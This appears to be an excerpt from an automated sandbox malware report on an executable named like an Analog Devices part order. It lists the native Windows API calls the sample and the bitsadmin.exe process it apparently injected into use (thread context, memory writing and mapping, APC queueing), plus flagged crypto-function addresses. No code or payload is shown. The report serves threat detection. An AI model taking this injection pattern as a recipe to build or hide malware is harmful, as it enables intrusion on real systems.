Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017435C0 NtCreateMutant,LdrInitializeThunk,	2_2_017435C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01744340 NtSetContextThread,	2_2_01744340
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01744650 NtSuspendThread,	2_2_01744650
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742BF0 NtAllocateVirtualMemory,	2_2_01742BF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742BE0 NtQueryValueKey,	2_2_01742BE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742BA0 NtEnumerateValueKey,	2_2_01742BA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742B80 NtQueryInformationFile,	2_2_01742B80
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742AF0 NtWriteFile,	2_2_01742AF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742AD0 NtReadFile,	2_2_01742AD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742AB0 NtWaitForSingleObject,	2_2_01742AB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742D30 NtUnmapViewOfSection,	2_2_01742D30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742D10 NtMapViewOfSection,	2_2_01742D10
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742D00 NtSetInformationFile,	2_2_01742D00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742DD0 NtDelayExecution,	2_2_01742DD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742DB0 NtEnumerateKey,	2_2_01742DB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742C60 NtCreateKey,	2_2_01742C60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742C00 NtQueryInformationProcess,	2_2_01742C00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742CF0 NtOpenProcess,	2_2_01742CF0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742CC0 NtQueryVirtualMemory,	2_2_01742CC0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742CA0 NtQueryInformationToken,	2_2_01742CA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742F60 NtCreateProcessEx,	2_2_01742F60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742F30 NtCreateSection,	2_2_01742F30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742FE0 NtCreateFile,	2_2_01742FE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742FB0 NtResumeThread,	2_2_01742FB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742FA0 NtQuerySection,	2_2_01742FA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742F90 NtProtectVirtualMemory,	2_2_01742F90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742E30 NtWriteVirtualMemory,	2_2_01742E30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742EE0 NtQueueApcThread,	2_2_01742EE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742EA0 NtAdjustPrivilegesToken,	2_2_01742EA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01742E80 NtReadVirtualMemory,	2_2_01742E80
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01743010 NtOpenDirectoryObject,	2_2_01743010
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01743090 NtSetValueKey,	2_2_01743090
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017439B0 NtGetContextThread,	2_2_017439B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01743D70 NtOpenThread,	2_2_01743D70
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01743D10 NtOpenProcessToken,	2_2_01743D10
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03054340 NtSetContextThread,LdrInitializeThunk,	7_2_03054340
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03054650 NtSuspendThread,LdrInitializeThunk,	7_2_03054650
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052B60 NtClose,LdrInitializeThunk,	7_2_03052B60
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_03052BA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_03052BE0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_03052BF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052AD0 NtReadFile,LdrInitializeThunk,	7_2_03052AD0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052AF0 NtWriteFile,LdrInitializeThunk,	7_2_03052AF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052F30 NtCreateSection,LdrInitializeThunk,	7_2_03052F30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052FB0 NtResumeThread,LdrInitializeThunk,	7_2_03052FB0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052FE0 NtCreateFile,LdrInitializeThunk,	7_2_03052FE0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_03052E80
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_03052EE0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_03052D10
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_03052D30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052DD0 NtDelayExecution,LdrInitializeThunk,	7_2_03052DD0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_03052DF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052C60 NtCreateKey,LdrInitializeThunk,	7_2_03052C60
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_03052C70
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_03052CA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030535C0 NtCreateMutant,LdrInitializeThunk,	7_2_030535C0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_030539B0 NtGetContextThread,LdrInitializeThunk,	7_2_030539B0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052B80 NtQueryInformationFile,	7_2_03052B80
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052AB0 NtWaitForSingleObject,	7_2_03052AB0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052F60 NtCreateProcessEx,	7_2_03052F60
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052F90 NtProtectVirtualMemory,	7_2_03052F90
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052FA0 NtQuerySection,	7_2_03052FA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052E30 NtWriteVirtualMemory,	7_2_03052E30
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052EA0 NtAdjustPrivilegesToken,	7_2_03052EA0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052D00 NtSetInformationFile,	7_2_03052D00
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052DB0 NtEnumerateKey,	7_2_03052DB0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052C00 NtQueryInformationProcess,	7_2_03052C00
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052CC0 NtQueryVirtualMemory,	7_2_03052CC0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03052CF0 NtOpenProcess,	7_2_03052CF0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03053010 NtOpenDirectoryObject,	7_2_03053010
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03053090 NtSetValueKey,	7_2_03053090
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03053D10 NtOpenProcessToken,	7_2_03053D10
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_03053D70 NtOpenThread,	7_2_03053D70
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C8F70 NtCreateFile,	7_2_006C8F70
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C90E0 NtReadFile,	7_2_006C90E0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C91D0 NtDeleteFile,	7_2_006C91D0
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C9270 NtClose,	7_2_006C9270
Source: C:\Windows\SysWOW64\bitsadmin.exe	Code function: 7_2_006C93D0 NtAllocateVirtualMemory,	7_2_006C93D0

Detected potential crypto function

Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01332500	0_2_01332500
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01330870	0_2_01330870
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01331330	0_2_01331330
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01331AD8	0_2_01331AD8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013342B9	0_2_013342B9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013342C8	0_2_013342C8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01335160	0_2_01335160
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01333347	0_2_01333347
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013312A0	0_2_013312A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013355B0	0_2_013355B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013355A0	0_2_013355A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01335779	0_2_01335779
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01335788	0_2_01335788
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_013359F3	0_2_013359F3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_01335A00	0_2_01335A00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F549F	0_2_051F549F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F6498	0_2_051F6498
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F6488	0_2_051F6488
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F54B0	0_2_051F54B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051FB71F	0_2_051FB71F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051FB730	0_2_051FB730
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F7680	0_2_051F7680
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051FC0E3	0_2_051FC0E3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F5FB0	0_2_051F5FB0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F5FC0	0_2_051F5FC0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F0950	0_2_051F0950
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F5A60	0_2_051F5A60
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_051F5A98	0_2_051F5A98
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_07B56984	0_2_07B56984
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_07B58DC9	0_2_07B58DC9
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD4BE0	0_2_09CD4BE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD08E8	0_2_09CD08E8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD08F8	0_2_09CD08F8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD04C0	0_2_09CD04C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_09CD04B0	0_2_09CD04B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B242A3A	0_2_0B242A3A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B245A78	0_2_0B245A78
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B240AD0	0_2_0B240AD0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B247990	0_2_0B247990
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B241C90	0_2_0B241C90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B2412D8	0_2_0B2412D8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B246018	0_2_0B246018
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B240040	0_2_0B240040
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B2470E0	0_2_0B2470E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B245638	0_2_0B245638
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B244BA8	0_2_0B244BA8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B246910	0_2_0B246910
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B243968	0_2_0B243968
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B244811	0_2_0B244811
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B247F70	0_2_0B247F70
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24DE88	0_2_0B24DE88
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24ED90	0_2_0B24ED90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B244DC8	0_2_0B244DC8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B245CC0	0_2_0B245CC0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24F1C8	0_2_0B24F1C8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B245040	0_2_0B245040
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B241720	0_2_0B241720
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B24F600	0_2_0B24F600
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B244518	0_2_0B244518
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 0_2_0B246460	0_2_0B246460
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00418513	2_2_00418513
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00402910	2_2_00402910
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00403130	2_2_00403130
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0042EC53	2_2_0042EC53
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040FC7A	2_2_0040FC7A
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004044E5	2_2_004044E5
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040FC83	2_2_0040FC83
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004025D0	2_2_004025D0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_004166CC	2_2_004166CC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040DEA3	2_2_0040DEA3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040FEA3	2_2_0040FEA3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0041670E	2_2_0041670E
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_00416713	2_2_00416713
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040DFE8	2_2_0040DFE8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0040DFF3	2_2_0040DFF3
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01798158	2_2_01798158
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017AA118	2_2_017AA118
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700100	2_2_01700100
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C81CC	2_2_017C81CC
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D01AA	2_2_017D01AA
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C41A2	2_2_017C41A2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017A2000	2_2_017A2000
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CA352	2_2_017CA352
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171E3F0	2_2_0171E3F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D03E6	2_2_017D03E6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0274	2_2_017B0274
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017902C0	2_2_017902C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710535	2_2_01710535
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017D0591	2_2_017D0591
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C2446	2_2_017C2446
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B4420	2_2_017B4420
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017BE4F6	2_2_017BE4F6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710770	2_2_01710770
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01734750	2_2_01734750
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170C7C0	2_2_0170C7C0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0172C6E0	2_2_0172C6E0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01726962	2_2_01726962
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017129A0	2_2_017129A0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017DA9A6	2_2_017DA9A6
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171A840	2_2_0171A840
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01712840	2_2_01712840
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0173E8F0	2_2_0173E8F0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016F68B8	2_2_016F68B8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CAB40	2_2_017CAB40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C6BD7	2_2_017C6BD7
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170EA80	2_2_0170EA80
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017ACD1F	2_2_017ACD1F
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171AD00	2_2_0171AD00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0170ADE0	2_2_0170ADE0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01728DBF	2_2_01728DBF
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710C00	2_2_01710C00
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01700CF2	2_2_01700CF2
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B0CB5	2_2_017B0CB5
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01784F40	2_2_01784F40
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01730F30	2_2_01730F30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017B2F30	2_2_017B2F30
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01752F28	2_2_01752F28
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01702FC8	2_2_01702FC8
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0178EFA0	2_2_0178EFA0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01710E59	2_2_01710E59
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CEE26	2_2_017CEE26
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CEEDB	2_2_017CEEDB
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_01722E90	2_2_01722E90
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017CCE93	2_2_017CCE93
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017DB16B	2_2_017DB16B
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0174516C	2_2_0174516C
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_016FF172	2_2_016FF172
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_0171B1B0	2_2_0171B1B0
Source: C:\Users\user\Desktop\3500 ADUM1401ARWZ-RL ANALOG DEVICES.exe	Code function: 2_2_017C70E9	2_2_017C70E9
